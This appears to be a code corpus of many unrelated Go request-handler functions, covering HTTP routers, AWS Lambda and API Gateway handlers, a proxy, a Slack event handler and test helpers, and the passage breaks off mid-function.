"func handleRequest(conn net.Conn, c *C) {\n\tc.Assert(conn, NotNil)\n\tdefer conn.Close()\n\tvar msg msgpb.Message\n\tmsgID, err := util.ReadMessage(conn, &msg)\n\tc.Assert(err, IsNil)\n\tc.Assert(msgID, Greater, uint64(0))\n\tc.Assert(msg.GetMsgType(), Equals, msgpb.MessageType_KvReq)\n\n\treq := msg.GetKvReq()\n\tc.Assert(req, NotNil)\n\tvar resp pb.Response\n\tresp.Type = req.Type\n\tmsg = msgpb.Message{\n\t\tMsgType: msgpb.MessageType_KvResp,\n\t\tKvResp: &resp,\n\t}\n\terr = util.WriteMessage(conn, msgID, &msg)\n\tc.Assert(err, IsNil)\n}", "func requestHandler(res http.ResponseWriter, req *http.Request) {\n\n\t// Configure CORS setting\n\tutilities.ConfigureCors(&res)\n\n\t// configure logging\n\tlogger := lg.CreateLogger()\n\n\t// dependency inject firestore client\n\tfsc := fs.GetClient()\n\n\tvar user string\n\n\t// extract query parameters\n\tquery := req.URL.Query()\n\tparamCount := len(req.URL.Query())\n\n\tteam := query[\"team\"][0]\n\tif paramCount > 1 {\n\t\tuser = query[\"user\"][0]\n\t}\n\n\t// switch logic via HTTP request verb\n\tswitch req.Method {\n\tcase \"GET\":\n\t\tif paramCount == 1 {\n\t\t\tscore := TeamSentiment(team, fsc)\n\t\t\ttmp := fmt.Sprintf(\"%.4f\", score)\n\t\t\tfmt.Fprint(res, fmt.Sprintf(tmp))\n\t\t} else {\n\t\t\tscore := IndividualSentiment(team, user, fsc)\n\t\t\ttmp := fmt.Sprintf(\"%.4f\", score)\n\t\t\tfmt.Fprint(res, fmt.Sprintf(tmp))\n\t\t}\n\tcase \"OPTIONS\":\n\t\treturn\n\tdefault:\n\t\tres.WriteHeader(http.StatusNotFound)\n\t\tfmt.Fprint(res, \"Unknown API endpoint\")\n\t\terr := fmt.Errorf(\"method %s for %s not supported\", req.Method, req.URL)\n\t\tlogger.Infof(\"sentiment API error: %v\", err.Error())\n\t}\n}", "func handler(request json.RawMessage) error {\n\t// Initiialize a connection to Sentry to capture errors and traces\n\tsentry.Init(sentry.ClientOptions{\n\t\tDsn: os.Getenv(\"SENTRY_DSN\"),\n\t\tTransport: &sentry.HTTPSyncTransport{\n\t\t\tTimeout: time.Second * 3,\n\t\t},\n\t\tServerName: os.Getenv(\"FUNCTION_NAME\"),\n\t\tRelease: os.Getenv(\"VERSION\"),\n\t\tEnvironment: os.Getenv(\"STAGE\"),\n\t})\n\n\treq, err := acmeserverless.UnmarshalCreditCardValidatedEvent(request)\n\tif err != nil {\n\t\tsentry.CaptureException(fmt.Errorf(\"error unmarshalling creditcard validated event: %s\", err.Error()))\n\t\treturn err\n\t}\n\n\tshipmentStatus := acmeserverless.ShipmentData{\n\t\tOrderNumber: req.Data.OrderID,\n\t\tStatus: req.Data.Message,\n\t}\n\n\tdynamoStore := dynamodb.New()\n\tord, err := dynamoStore.UpdateStatus(shipmentStatus)\n\tif err != nil {\n\t\tsentry.CaptureException(fmt.Errorf(\"error updating shipment status: %s\", err.Error()))\n\t\treturn err\n\t}\n\n\tif req.Data.Success {\n\t\tem := eventbridge.New()\n\t\tevt := acmeserverless.ShipmentRequested{\n\t\t\tMetadata: acmeserverless.Metadata{\n\t\t\t\tDomain: acmeserverless.OrderDomain,\n\t\t\t\tSource: \"ShipOrder\",\n\t\t\t\tType: acmeserverless.ShipmentRequestedEventName,\n\t\t\t\tStatus: \"success\",\n\t\t\t},\n\t\t\tData: acmeserverless.ShipmentRequest{\n\t\t\t\tOrderID: req.Data.OrderID,\n\t\t\t\tDelivery: ord.Delivery,\n\t\t\t},\n\t\t}\n\n\t\tsentry.AddBreadcrumb(&sentry.Breadcrumb{\n\t\t\tCategory: acmeserverless.ShipmentRequestedEventName,\n\t\t\tTimestamp: time.Now(),\n\t\t\tLevel: sentry.LevelInfo,\n\t\t\tData: acmeserverless.ToSentryMap(evt.Data),\n\t\t})\n\n\t\terr = em.SendShipmentRequestedEvent(evt)\n\t\tif err != nil {\n\t\t\tsentry.CaptureException(fmt.Errorf(\"error sending ShipmentRequested event: %s\", err.Error()))\n\t\t\treturn err\n\t\t}\n\n\t\tsentry.CaptureMessage(fmt.Sprintf(\"shipment successfully requested for order [%s]\", req.Data.OrderID))\n\n\t}\n\n\treturn nil\n}", "func healthCheckHandler(ctx *gin.Context) {\n log.Info(\"received request to health check route\")\n ctx.JSON(http.StatusOK, gin.H{\n \"http_code\": http.StatusOK, \"message\": \"Service running\"})\n}", "func (proxy *proxyService) handleRequest(\n\tw gohttp.ResponseWriter, r *gohttp.Request,\n) {\n\tlogger := proxy.logger\n\n\t// Per the stdlib docs, \"It is an error to set this field in an HTTP client\n\t// request\". Therefore, we ensure it is empty in case the client set it.\n\tr.RequestURI = \"\"\n\n\t// Send request to target service\n\n\tresp, err := proxy.transport.RoundTrip(r)\n\tif err != nil {\n\t\tlogger.Debugf(\"Error: %v\\n\", err)\n\t\tgohttp.Error(w, err.Error(), 503)\n\t\treturn\n\t}\n\n\t// Send response to client (everything below)\n\n\tlogger.Debugf(\"Received response status: %s\\n\", resp.Status)\n\n\tcopyHeaders(w.Header(), resp.Header)\n\n\tw.WriteHeader(resp.StatusCode)\n\n\t_, err = io.Copy(w, resp.Body)\n\tif err != nil {\n\t\tlogger.Errorf(\"Can't write response to body: %s\\n\", err)\n\t}\n\n\terr = resp.Body.Close()\n\tif err != nil {\n\t\tlogger.Debugf(\"Can't close response body %v\\n\", err)\n\t}\n}", "func badGateway(rw http.ResponseWriter, r *http.Request) {\n\n}", "func HandleRequest(req events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\t// TODO: check for cookie\n\n\tdb, err := episodic.NewDataBucket(os.Getenv(\"DATA_BUCKET\"), \"data.json\")\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\tdata, err := db.Get()\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\tidStr, ok := req.QueryStringParameters[\"id\"]\n\tif !ok {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, errors.New(\"no id param found in query string\")\n\t}\n\n\tid, err := strconv.Atoi(idStr)\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\tif data, err = db.RemoveEpisode(id); err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\tsort.Sort(episodic.ByAirDate(data.WatchList))\n\n\tjsonStr, err := json.Marshal(&Response{WatchList: data.WatchList})\n\tif err != nil {\n\t\treturn events.APIGatewayProxyResponse{StatusCode: 500}, err\n\t}\n\n\treturn events.APIGatewayProxyResponse{\n\t\tStatusCode: 200,\n\t\tHeaders: map[string]string{\n\t\t\t\"content-type\": \"application/json\",\n\t\t\t\"access-control-allow-origin\": \"*\",\n\t\t},\n\t\tBody: string(jsonStr),\n\t}, nil\n}", "func handlePingToServer(res http.ResponseWriter, req *http.Request) {\n\tvar testClusterReq domain.Server\n\n\tctx := traceable_context.WithUUID(uuid.New())\n\tcontent, err := ioutil.ReadAll(req.Body)\n\tif err != nil {\n\t\tlog.Logger.ErrorContext(ctx, \"error occurred while reading request\", err)\n\t\tres.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\terr = json.Unmarshal(content, &testClusterReq)\n\tif err != nil {\n\t\tlog.Logger.ErrorContext(ctx, \"unmarshal error\", err)\n\t\tres.WriteHeader(http.StatusBadRequest)\n\t\treturn\n\t}\n\n\t//ssh ping to server\n\t//note : req address validations should be added in frontend\n\tok, err := cloud.PingToServer(ctx, testClusterReq.Host)\n\tif err != nil {\n\t\tlog.Logger.ErrorContext(ctx, \"ping to server failed\")\n\t\tres.WriteHeader(http.StatusInternalServerError)\n\t\treturn\n\t}\n\n\tif ok {\n\t\tlog.Logger.TraceContext(ctx, \"ping to server is successful\")\n\t\tres.WriteHeader(http.StatusOK)\n\t}\n\n}", "func handleRequests() {\n\trouter := chi.NewRouter()\n\n\trouter.Use(cors.Handler(cors.Options{\n AllowedOrigins: []string{\"*\"},\n AllowedMethods: []string{\"GET\", \"POST\", \"PUT\", \"DELETE\", \"OPTIONS\"},\n AllowedHeaders: []string{\"Accept\", \"Authorization\", \"Content-Type\", \"X-CSRF-Token\"},\n ExposedHeaders: []string{\"Link\"},\n\tAllowCredentials: false,\n\t}))\n\n\trouter.Post(\"/users\", CreateUser)\n\trouter.Get(\"/users\", ListAllUsers)\n\trouter.Get(\"/users/{name}\", getUser)\n\trouter.Get(\"/scores\", ListBestScores)\n\trouter.Put(\"/users/{id}\", UpdateScore)\n\n\tlog.Fatal(http.ListenAndServe(\":8081\", router))\n}", "func (bas *BaseService) OnRequest(ctx context.Context, args Args) {}", "func HandlePostRequest(w http.ResponseWriter, r *http.Request) {\n\n}", "func handleRequest() {\n\tmyRouter := mux.NewRouter().StrictSlash(true)\n\tmyRouter.HandleFunc(\"/\", homePage)\n\tmyRouter.HandleFunc(\"/all\", returnAllFacts).Methods(\"GET\")\n\tmyRouter.HandleFunc(\"/fact/{id}\", returnSingleFact).Methods(\"GET\")\n\tmyRouter.HandleFunc(\"/random\", returnRandomFact).Methods(\"GET\")\n\tmyRouter.HandleFunc(\"/fact\", createNewFact).Methods(\"POST\")\n\tmyRouter.HandleFunc(\"/fact/{id}\", updateFact).Methods(\"PUT\")\n\tmyRouter.HandleFunc(\"/fact/{id}\", deleteFact).Methods(\"DELETE\")\n\tlog.Fatal(http.ListenAndServe(\":10000\", myRouter))\n}", "func (c *Client) HandleRequest(req *http.Request) (res *http.Response, err error) {\n\treq.URL.Path = \"/api/v\" + c.APIVersion + req.URL.Path\n\n\t// Fill out Host and Scheme if it is empty\n\tif req.URL.Host == \"\" {\n\t\treq.URL.Host = c.URLHost\n\t}\n\tif req.URL.Scheme == \"\" {\n\t\treq.URL.Scheme = c.URLScheme\n\t}\n\tif req.Header.Get(\"User-Agent\") == \"\" {\n\t\treq.Header.Set(\"User-Agent\", c.UserAgent)\n\t}\n\tif req.Header.Get(\"Authorization\") == \"\" {\n\t\treq.Header.Set(\"Authorization\", \"Bot \"+c.Token)\n\t}\n\n\tres, err = c.HTTP.Do(req)\n\tif err != nil {\n\t\treturn\n\t}\n\n\tif res.StatusCode == http.StatusUnauthorized {\n\t\terr = errors.New(\"Invalid token passed\")\n\t\treturn\n\t}\n\n\treturn\n}", "func (s *service) reqHandler(endpoint *Endpoint, req *request) {\n\tstart := time.Now()\n\tendpoint.Handler.Handle(req)\n\ts.m.Lock()\n\tendpoint.stats.NumRequests++\n\tendpoint.stats.ProcessingTime += time.Since(start)\n\tavgProcessingTime := endpoint.stats.ProcessingTime.Nanoseconds() / int64(endpoint.stats.NumRequests)\n\tendpoint.stats.AverageProcessingTime = time.Duration(avgProcessingTime)\n\n\tif req.respondError != nil {\n\t\tendpoint.stats.NumErrors++\n\t\tendpoint.stats.LastError = req.respondError.Error()\n\t}\n\ts.m.Unlock()\n}", "func (s *APIServer) SubmitEventHandlerFrontendRequest(ctx context.Context, in *klessapi.SubmitEventHandlerFrontendRequestRequest) (*klessapi.SubmitEventHandlerFrontendRequestReply, error) {\n\n\te := &etcdinterface.EtcdInterface{}\n\n\tfrontendJSON, _ := e.GetValue(\"/kless/frontend/\" + in.EventHandlerFrontendName)\n\n\teventHandlerFrontendInfo := klesshandlers.EventHandlerFrontendInfo{}\n\terr := json.Unmarshal([]byte(frontendJSON), &eventHandlerFrontendInfo)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tstatus := \"N/A\"\n\tvar response []byte\n\n\tbuildersJSON, _ := e.GetValuesFromPrefix(\"/kless/handlers/\")\n\n\tfor i := 0; i < len(buildersJSON); i++ {\n\t\teventHandlerInfo := klesshandlers.EventHandlerInfo{}\n\t\terr := json.Unmarshal([]byte(buildersJSON[i]), &eventHandlerInfo)\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tfmt.Printf(\"Checking for matching frontend with handler: %s\\n\", eventHandlerInfo.Name)\n\n\t\tif eventHandlerInfo.Frontend == in.EventHandlerFrontendName {\n\t\t\tfmt.Printf(\"Found handler matching frontend name\\n\")\n\n\t\t\thandler := &klesshandlers.ServiceHandler{}\n\n\t\t\turl := \"http://\" + handler.GetServiceName(&eventHandlerInfo) + \".\" + eventHandlerInfo.Namespace + \":\" + eventHandlerFrontendInfo.Information[\"KLESS_FRONTEND_HTTP_PORT\"]\n\n\t\t\tfmt.Printf(\"URL = %s\\n\", url)\n\n\t\t\treq, err := http.NewRequest(\"POST\", url, bytes.NewBuffer(in.Request))\n\t\t\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\t\t\tclient := &http.Client{}\n\t\t\tresp, err := client.Do(req)\n\t\t\tif err != nil {\n\t\t\t\tlog.Fatal(err)\n\t\t\t}\n\t\t\tdefer resp.Body.Close()\n\n\t\t\tfmt.Println(\"response Status:\", resp.Status)\n\t\t\tfmt.Println(\"response Headers:\", resp.Header)\n\t\t\tbody, _ := ioutil.ReadAll(resp.Body)\n\t\t\tfmt.Println(\"response Body:\", string(body))\n\n\t\t\tstatus = \"OK\"\n\t\t\tresponse = body\n\t\t}\n\t}\n\n\treturn &klessapi.SubmitEventHandlerFrontendRequestReply{Status: status, Response: response}, nil\n}", "func handlerICon(w http.ResponseWriter, r *http.Request) {}", "func handleGetRequest(rw rest.ResponseWriter, req *rest.Request) {\n\trw.WriteJson(map[string]string{\"body\": \"use POST https://localhost:433/sync, include authentication\"})\n}", "func handler(w http.ResponseWriter, r *http.Request) {\n\thandlerReal(false, w, r)\n}", "func HandleRequest(ctx context.Context, evt *webhooks.Data) (*webhooks.DataResponse, error) {\n\trespCode, err := client.SendEvent(ctx, evt)\n\tif err != nil {\n\t\treturn &webhooks.DataResponse{StatusCode: 0, DeliveredTime: 0, Error: err.Error()}, err\n\t}\n\treturn &webhooks.DataResponse{StatusCode: respCode, DeliveredTime: time.Now().UnixNano()}, nil\n}", "func Handler(ctx context.Context, req events.APIGatewayProxyRequest) (Response, error) {\n\tvar buf bytes.Buffer\n\n\tvar message string\n\tmessage = req.Path\n\n\tlog.Print(fmt.Sprint(\"Called with path: \", req.Path))\n\tstatusCode := 200\n\n\t// Could use a third party routing library at this point, but being hacky for now\n\titems := strings.Split(req.Path, \"/\")\n\tvar item string\n\tif len(items) > 1 {\n\t\titem = strings.Join(items[2:], \"/\")\n\t}\n\n\t// If we actually have an action to take\n\tif len(items) >= 1 {\n\t\tswitch items[1] {\n\t\tcase \"list\":\n\t\t\titems, err := List()\n\t\t\tif err != nil {\n\t\t\t\tstatusCode = 500\n\t\t\t\tmessage = fmt.Sprint(err)\n\t\t\t} else {\n\t\t\t\tmessage = strings.Join(items, \"\\n\")\n\t\t\t}\n\t\tcase \"add\":\n\t\t\t// Should probably be doing this on PUT or POST only\n\t\t\terr := Add(item)\n\t\t\tif err != nil {\n\t\t\t\tstatusCode = 500\n\t\t\t\tmessage = fmt.Sprint(err)\n\t\t\t} else {\n\t\t\t\tmessage = \"Added\"\n\t\t\t}\n\n\t\tcase \"complete\":\n\t\t\t// Should only be doing this on POST, but demo\n\t\t\terr := Complete(item)\n\t\t\tif err != nil {\n\t\t\t\tstatusCode = 500\n\t\t\t\tmessage = fmt.Sprint(err)\n\t\t\t} else {\n\t\t\t\tmessage = \"Completed\"\n\t\t\t}\n\t\t}\n\t}\n\n\tbody, err := json.Marshal(map[string]interface{}{\n\t\t\"message\": message,\n\t})\n\tif err != nil {\n\t\treturn Response{StatusCode: 404}, err\n\t}\n\tjson.HTMLEscape(&buf, body)\n\n\tresp := Response{\n\t\tStatusCode: statusCode,\n\t\tIsBase64Encoded: false,\n\t\tBody: buf.String(),\n\t\tHeaders: map[string]string{\n\t\t\t\"Content-Type\": \"application/json\",\n\t\t\t\"X-MyCompany-Func-Reply\": \"hello-handler\",\n\t\t},\n\t}\n\n\treturn resp, nil\n}", "func demoHandler(w http.ResponseWriter, r *http.Request) {\n\thostEndpoint := os.Getenv(\"HOST_ENDPOINT\")\n\tif hostEndpoint == \"\" {\n\t\tlog.Fatal(\"HOST_ENDPOINT env variable not provided\")\n\t}\n\n\thostEndpoint += \"/whoami\"\n\n\trs, err := client.Get(hostEndpoint)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tdefer rs.Body.Close()\n\n\tbodyBytes, err := ioutil.ReadAll(rs.Body)\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\tbodyString := string(bodyBytes)\n\tfmt.Fprintf(w, \"We got a response form %s!\\nResponse body:\\n%s\", hostEndpoint, bodyString)\n}", "func RequestHandler(inner http.Handler, name string, method string) http.Handler {\n\treturn http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n\t\tstart := time.Now()\n\t\terr := false\n\n\t\t// Set server header\n\t\tw.Header().Add(\"Server\", \"Flock/\"+version)\n\t\tw.Header().Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t\tw.Header().Set(\"Cache-control\", \"no-cache\")\n\t\tw.Header().Set(\"Pragma\", \"no-cache\")\n\n\t\tif r.Method != method {\n\t\t\tw.WriteHeader(http.StatusMethodNotAllowed)\n\t\t\tjson.NewEncoder(w).Encode(&ServiceError{\n\t\t\t\tMessage: \"Endpoint does not accept method\",\n\t\t\t\tSolution: \"Change HTTP method\",\n\t\t\t\tErrorCode: http.StatusMethodNotAllowed,\n\t\t\t})\n\t\t\terr = true\n\t\t}\n\n\t\t// Serve reponse\n\t\tif !err {\n\t\t\tinner.ServeHTTP(w, r)\n\t\t}\n\n\t\tif verbose {\n\t\t\tlog.Printf(\"%s -> %s\\t%s\\t%s\\t%s\",\n\t\t\t\tr.RemoteAddr,\n\t\t\t\tr.Method,\n\t\t\t\tr.RequestURI,\n\t\t\t\tname,\n\t\t\t\ttime.Since(start),\n\t\t\t)\n\t\t}\n\t})\n}", "func handleRequest(fn func(http.ResponseWriter, *http.Request)) http.HandlerFunc {\n\treturn func(rw http.ResponseWriter, req *http.Request) {\n\t\tfn(rw, req)\n\t}\n}", "func (m *Messenger) handle(w http.ResponseWriter, r *http.Request) {\n\tif r.Method == \"GET\" {\n\t\tm.verifyHandler(w, r)\n\t\treturn\n\t}\n\n\tvar rec Receive\n\n\t// consume a *copy* of the request body\n\tbody, _ := ioutil.ReadAll(r.Body)\n\tr.Body = ioutil.NopCloser(bytes.NewBuffer(body))\n\n\terr := json.Unmarshal(body, &rec)\n\tif err != nil {\n\t\terr = xerrors.Errorf(\"could not decode response: %w\", err)\n\t\tfmt.Println(err)\n\t\tfmt.Println(\"could not decode response:\", err)\n\t\trespond(w, http.StatusBadRequest)\n\t\treturn\n\t}\n\n\tif rec.Object != \"page\" {\n\t\tfmt.Println(\"Object is not page, undefined behaviour. Got\", rec.Object)\n\t\trespond(w, http.StatusUnprocessableEntity)\n\t\treturn\n\t}\n\n\tif m.verify {\n\t\tif err := m.checkIntegrity(r); err != nil {\n\t\t\tfmt.Println(\"could not verify request:\", err)\n\t\t\trespond(w, http.StatusUnauthorized)\n\t\t\treturn\n\t\t}\n\t}\n\n\tm.dispatch(rec)\n\n\trespond(w, http.StatusAccepted) // We do not return any meaningful response immediately so it should be 202\n}", "func (api *Api) handleRequest(handler RequestHandlerFunction) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\thandler(api.DB, w, r)\n\t}\n}", "func HandleRequest(request events.APIGatewayProxyRequest) (Response, error) {\n\tlog.Println(\"start\")\n\n\teventsAPIEvent, err := getAPIEvents(request.Body)\n\tif err != nil {\n\t\tlog.Print(err)\n\t\treturn Response{\n\t\t\tStatusCode: 400,\n\t\t}, err\n\t}\n\n\tlog.Printf(\"eventsAPIEvent: %+v\\n\", eventsAPIEvent)\n\tswitch eventsAPIEvent.Type {\n\tcase slackevents.URLVerification:\n\t\treturn getChallengeResponse(request.Body)\n\tcase slackevents.CallbackEvent:\n\t\tinnerEvent := eventsAPIEvent.InnerEvent\n\t\tswitch ev := innerEvent.Data.(type) {\n\t\tcase *slackevents.AppMentionEvent:\n\t\t\treturn getMentionEventResponse(ev)\n\t\tcase *slackevents.MessageEvent:\n\t\t\treturn getDmEventResponse(ev)\n\t\tdefault:\n\t\t\tlog.Printf(\"unsupported event: %+v\\n\", ev)\n\t\t}\n\tdefault:\n\t\tlog.Printf(\"unsupported type: %+v\\n\", eventsAPIEvent)\n\t}\n\tlog.Println(\"no effect.\")\n\treturn Response{\n\t\tStatusCode: 400,\n\t}, nil\n}", "func (app *App) handleRequest(handler RequestHandlerFunction) http.HandlerFunc {\r\n\treturn func(w http.ResponseWriter, r *http.Request) {\r\n\t\thandler(app.DB, w, r)\r\n\t}\r\n}", "func sendRequestToHandler(handler rest.Handler, requestBody io.Reader, path string) (*bytes.Buffer, int, error) {\n\t// prepare request\n\treq, err := http.NewRequest(handler.Method(), path, requestBody)\n\tif err != nil {\n\t\treturn nil, 0, err\n\t}\n\n\t// prepare router\n\trouter := mux.NewRouter()\n\n\trouter.HandleFunc(handler.Path(), handler.Handle()).Methods(handler.Method())\n\n\t// create a ResponseRecorder (which satisfies http.ResponseWriter) to record the response.\n\trr := httptest.NewRecorder()\n\n\t// serve http on given response and request\n\trouter.ServeHTTP(rr, req)\n\n\treturn rr.Body, rr.Code, nil\n}", "func HandleRequest(ctx context.Context, sqsEvent events.SQSEvent) error {\n\tlog.Println(\"The event received\")\n\tlog.Println(sqsEvent)\n\tvar messageBody MessageBody\n\tclient := sfn.New(session.Must(session.NewSession()))\n\tfor _, message := range sqsEvent.Records {\n\t\tjson.Unmarshal([]byte(message.Body), &messageBody)\n\t\tmessageTitle, _ := json.Marshal(messageBody.MessageTitle)\n\t\tparams := &sfn.SendTaskSuccessInput{\n\t\t\tOutput: aws.String(string(messageTitle)),\n\t\t\tTaskToken: aws.String(messageBody.TaskToken),\n\t\t}\n\t\t_, err := client.SendTaskSuccess(params)\n\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\n\t}\n\treturn nil\n}", "func Handler(ctx context.Context, event Request) (Response, error) {\n\tsecretKeyAccessToken := os.Getenv(\"SECRET_ACCESS_TOKEN\")\n\n\ttokenString := event.AuthorizationToken\n\tsecretAccessToken := []byte(secretKeyAccessToken)\n\n\terr := verifyToken(tokenString, secretAccessToken)\n\n\tif err != nil {\n\t\treturn Response{}, errors.New(\"Unauthorized\")\n\t}\n\n\treturn generatePolicy(\"customer\", \"Allow\", event.MethodArn), nil\n}", "func svcHandler()", "func HandleRequest(db *sql.DB) {\n\troutes := chi.NewRouter()\n\t// Route for user API\n\troutes.Get(\"/v1/users\", initRetrieveResolver(db).GetAllUsers)\n\troutes.Post(\"/v1/users/create-user\", initCreateResolver(db).CreateUser)\n\t// Route for relationship API\n\troutes.Post(\"/v1/friend/create-friend\", initCreateResolver(db).MakeFriend)\n\troutes.Post(\"/v1/friend/get-friends-list\", initRetrieveResolver(db).GetFriendsList)\n\troutes.Post(\"/v1/friend/get-common-friends-list\", initRetrieveResolver(db).GetCommonFriends)\n\n\tlog.Fatal(http.ListenAndServe(\":8082\", routes))\n}", "func handle(w http.ResponseWriter, req *http.Request) {\n\tw.Write([]byte(\"Hello, Forest.\"))\n}", "func handler(w http.ResponseWriter, r *http.Request) {\n\t// Writes to the client\n\tfmt.Fprintf(w, \"Hello World\\n\")\n}", "func (c *cmdHttp) serverRoute(ctx context.Context) http.Handler {\n fn := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {\n if r.ProtoMajor == 2 && strings.Contains(\n r.Header.Get(\"Content-Type\"), \"application/grpc\") &&\n c.grpcHandler != nil {\n c.grpcHandler.ServeHTTP(w, r.WithContext(ctx))\n } else {\n chi.ServerBaseContext(ctx, c.handler).ServeHTTP(w, r)\n }\n })\n return fn\n}", "func handleRequest(resp *http.Response, err error) () {\n if err != nil {\n log.Fatal(err)\n }\n defer resp.Body.Close()\n\n // Dump response\n data, err := ioutil.ReadAll(resp.Body)\n if err != nil {\n log.Fatal(err)\n }\n fmt.Println(string(data))\n}", "func requestHandler(w http.ResponseWriter, r *http.Request) {\n\tw.WriteHeader(200)\n\tfmt.Fprintf(w, \"%s\", buildResponse())\n}", "func (this *HTTPHandler) handle(req Request) Response {\n\tname := resources.NewObjectName(req.Namespace, req.Name)\n\tlogctx := this.NewContext(\"object\", name.String())\n\tlogctx.Infof(\"handle request for %s\", req.Resource)\n\tresp := this.webhook.Handle(logctx, req)\n\tif err := resp.Complete(req); err != nil {\n\t\tlogctx.Error(err, \"unable to encode response\")\n\t\treturn ErrorResponse(http.StatusInternalServerError, errUnableToEncodeResponse)\n\t}\n\treturn resp\n}", "func Handler(ctx context.Context, request events.APIGatewayProxyRequest) (events.APIGatewayProxyResponse, error) {\n\tfmt.Printf(\"Processing request data for request %s.\\n\", request.RequestContext.RequestID)\n\n\t// extract env var\n\tuser := os.Getenv(\"PIXELA_USER\")\n\ttoken := os.Getenv(\"PIXELA_TOKEN\")\n\tactgraph := os.Getenv(\"PIXELA_ACTTIME_GRAPH\")\n\tcalgraph := os.Getenv(\"PIXELA_CAL_GRAPH\")\n\tdistgraph := os.Getenv(\"PIXELA_DIST_GRAPH\")\n\n\t// extract url from request\n\tvar reqbody Request\n\terr := json.Unmarshal([]byte(request.Body), &reqbody)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn events.APIGatewayProxyResponse{Body: \"Record failed\", StatusCode: 500}, err\n\t}\n\turl := reqbody.URL\n\tfmt.Printf(\"Posted URL: %s\\n\", url)\n\n\t// extract image url\n\timgURLs, err := getImageURL(url)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t\treturn events.APIGatewayProxyResponse{Body: \"Record failed\", StatusCode: 500}, err\n\t}\n\tfmt.Printf(\"Image URL: %s\\n\", imgURLs)\n\n\tfor _, imgURL := range imgURLs {\n\t\t// extract image bytes\n\t\timg, err := getImage(imgURL)\n\t\tif err != nil {\n\t\t\tfmt.Println(err.Error())\n\t\t\treturn events.APIGatewayProxyResponse{Body: \"Record failed\", StatusCode: 500}, err\n\t\t}\n\n\t\t// execute text detection of Rekognition\n\t\tres, err := exeRekognitionDetectText(img)\n\t\tif err != nil {\n\t\t\tfmt.Println(err.Error())\n\t\t\treturn events.APIGatewayProxyResponse{Body: \"Record failed\", StatusCode: 500}, err\n\t\t}\n\n\t\t// extract date & quantities from the above result\n\t\tdate, acttime, cal, dist := getValueFromRekognitionResult(res.TextDetections)\n\t\tfmt.Printf(\"date: %s, acttime: %s, cal: %s, dist: %s\\n\", date, acttime, cal, dist)\n\n\t\t// record pixel\n\t\terr = recordPixel(user, token, actgraph, date, acttime)\n\t\terr = recordPixel(user, token, calgraph, date, cal)\n\t\terr = recordPixel(user, token, distgraph, date, dist)\n\t\tif err != nil {\n\t\t\tfmt.Println(err)\n\t\t\treturn events.APIGatewayProxyResponse{Body: \"Record failed\", StatusCode: 500}, err\n\t\t}\n\t}\n\n\treturn events.APIGatewayProxyResponse{Body: \"Successfully recorded\", StatusCode: 200}, nil\n}", "func handlePatchRequest(w http.ResponseWriter, e *models.Endpoint, r *http.Request, entity entities.Entity, h *func() (interface{}, error)) {\n\tw.Header().Add(\"Access-Control-Allow-Origin\", \"*\")\n\tif !checkContentType(w, r) {\n\t\treturn\n\t}\n\n\tbyteData, _ := ioutil.ReadAll(r.Body)\n\terr := entity.ParseEntity(byteData)\n\tif err != nil {\n\t\tsendError(w, []error{err})\n\t\treturn\n\t}\n\n\thandle := *h\n\tdata, err2 := handle()\n\tif err2 != nil {\n\t\tsendError(w, []error{err2})\n\t\treturn\n\t}\n\n\tw.Header().Add(\"Location\", entity.GetSelfLink())\n\n\tsendJSONResponse(w, http.StatusOK, data, nil)\n}", "func handle(ctx p2p.HandlerContext) error {\n\tif ctx.IsRequest() {\n\t\tctx.Logger().Debug(\"node_service/handle : Information \",\n\t\t\tzap.String(\"address\", ctx.ID().Address),\n\t\t\tzap.String(\"public key\", ctx.ID().PubKey.String()[:PrintedLength]),\n\t\t\tzap.String(\"handler context\", \"is request\"),\n\t\t)\n\t\treturn nil\n\t}\n\n\tobj, err := ctx.DecodeMessage()\n\tif err != nil {\n\t\treturn nil\n\t}\n\n\tmsg, ok := obj.(*messageOverP2P)\n\tif !ok {\n\t\treturn nil\n\t}\n\n\tif len(msg.contents) == 0 {\n\t\treturn nil\n\t}\n\n\tatomic.AddUint32(&receivedMessageOverP2P, 1)\n\n\tctx.Logger().Debug(\"node_service/handle : Information \",\n\t\tzap.String(\"address\", ctx.ID().Address),\n\t\tzap.String(\"Public Key\", ctx.ID().PubKey.String()[:PrintedLength]),\n\t\tzap.String(\"Content Size\", humanize.Bytes(uint64(len(msg.contents)))),\n\t)\n\n\treturn nil\n}", "func handleRequests() {\n\trouter := mux.NewRouter().StrictSlash( true )\n\trouter.HandleFunc(\"/\", homeLink)\n\trouter.HandleFunc(\"/server\", createServer).Methods(\"POST\")\n\trouter.HandleFunc(\"/servers/{id}\", getOneServer).Methods(\"GET\")\n\trouter.HandleFunc(\"/servers/{id}\", updateServer).Methods(\"PATCH\")\n\trouter.HandleFunc(\"/servers/{id}\", deleteServer).Methods(\"DELETE\")\n\trouter.HandleFunc(\"/servers\", getAllServers).Methods(\"GET\")\n\trouter.HandleFunc(\"/servers\", findAddress).Methods(\"POST\")\n\tlog.Fatal(http.ListenAndServe(\":8888\", router))\n}", "func httpHandler(w http.ResponseWriter, r *http.Request) {\n\tb, err := ioutil.ReadAll(r.Body)\n\tdefer r.Body.Close()\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), 